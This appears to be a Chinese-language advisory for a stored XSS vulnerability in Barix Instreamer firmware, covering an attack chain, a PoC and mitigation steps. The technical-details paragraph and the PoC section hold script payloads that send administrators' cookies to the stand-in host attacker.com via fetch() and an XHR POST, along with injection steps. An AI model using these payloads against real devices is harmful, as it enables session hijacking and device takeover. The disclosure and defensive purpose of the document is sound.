CVE-2025-65231 Barix Instreamer 存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-65231

漏洞类型

XSS（跨站脚本攻击）

CVSS评分

6.1 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Barix Instreamer

漏洞概述

CVE-2025-65231是Barix Instreamer v04.06及更早版本中存在的一个存储型跨站脚本（Stored XSS）漏洞。该漏洞位于Web用户界面的I/O & Serial配置页面，具体问题出在CTS close命令的用户输入字段。攻击者可以在该字段中注入恶意JavaScript脚本代码，由于系统未对用户输入进行充分的输入验证和输出编码，恶意代码被永久存储在系统中。当管理员或其他用户访问设备的状态页面时，被植入的恶意脚本会被浏览器执行，从而导致会话劫持、敏感信息窃取、Cookie盗窃等安全问题。此漏洞的CVSS评分为6.1，属于中等严重程度，攻击复杂度低，无需认证即可实施攻击，但需要用户交互才能触发。攻击者可能利用此漏洞窃取管理员会话令牌，进而获取设备的完全控制权。

技术细节

该漏洞是一种典型的存储型XSS（Stored Cross-Site Scripting）漏洞。在Barix Instreamer设备的Web管理界面中，I/O & Serial配置页面提供了CTS close命令的输入字段，允许用户自定义配置串口通信参数。系统在接受用户输入后，未对特殊字符进行HTML实体编码或JavaScript转义，直接将输入内容存储到后端数据库。当用户访问Status（状态）页面时，系统从数据库读取之前保存的配置数据并渲染到网页中，恶意脚本随之被执行。攻击者只需构造包含JavaScript代码的Payload，如<script>alert(document.cookie)</script>或<script>fetch('https://attacker.com/steal?c='+document.cookie)</script>，即可在受害者浏览器中执行任意JavaScript代码。由于该输入字段在配置页面中，攻击者无需任何认证即可访问配置接口，降低了攻击门槛。受害者只需查看状态页面即可触发漏洞，无需进行其他操作。

攻击链分析

STEP 1

步骤1：信息收集

攻击者识别目标设备为Barix Instreamer固件版本v04.06或更早版本，确定Web管理界面的访问地址

STEP 2

步骤2：访问配置页面

攻击者访问设备的Web UI，导航至I/O & Serial配置页面，找到CTS close命令输入字段

STEP 3

步骤3：注入恶意脚本

在CTS close命令字段中注入包含恶意JavaScript代码的Payload，如<script>标签包裹的脚本代码

STEP 4

步骤4：保存配置

攻击者保存配置，恶意脚本被存储到设备的后端数据库中，无需认证即可完成此操作

STEP 5

步骤5：等待触发

当管理员或合法用户访问设备的Status（状态）页面时，系统从数据库读取配置数据并渲染到页面

STEP 6

步骤6：脚本执行

浏览器解析HTML时执行被植入的恶意JavaScript代码，攻击者可窃取Cookie、会话令牌等敏感信息

STEP 7

步骤7：权限提升

攻击者利用窃取的会话信息劫持管理员会话，获取设备的完全控制权，可进一步进行内网渗透

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2025-65231 Stored XSS PoC for Barix Instreamer -->
<!-- Inject this payload in the CTS close command field in I/O & Serial configuration page -->

<!-- Basic XSS Alert -->
<script>alert('XSS Vulnerability - CVE-2025-65231')</script>

<!-- Cookie Stealing Payload -->
<script>fetch('https://attacker.com/steal?cookie='+encodeURIComponent(document.cookie))</script>

<!-- Session Hijacking Payload -->
<script>var xhr=new XMLHttpRequest();xhr.open('POST','https://attacker.com/log',true);xhr.send(document.cookie);</script>

<!-- Steps to reproduce:
1. Access Barix Instreamer Web UI (default: http://192.168.0.100)
2. Navigate to: Settings > I/O & Serial
3. Find the 'CTS close command' input field
4. Paste one of the payloads above
5. Save configuration
6. Navigate to Status page
7. XSS will be triggered
-->

影响范围

Barix Instreamer v04.06及更早版本

Barix Instreamer firmware <= v04.06

防御指南

临时缓解措施

在官方修复版本发布之前，可采取以下临时缓解措施：1）限制Web管理界面的访问范围，仅允许受信任的IP地址访问；2）定期检查设备配置和日志，排查异常输入；3）使用Web应用防火墙（WAF）过滤恶意请求；4）避免使用管理员账户访问设备，启用双因素认证；5）监控网络流量，及时发现异常数据外传行为；6）考虑在网络层面隔离物联网设备，防止攻击横向移动。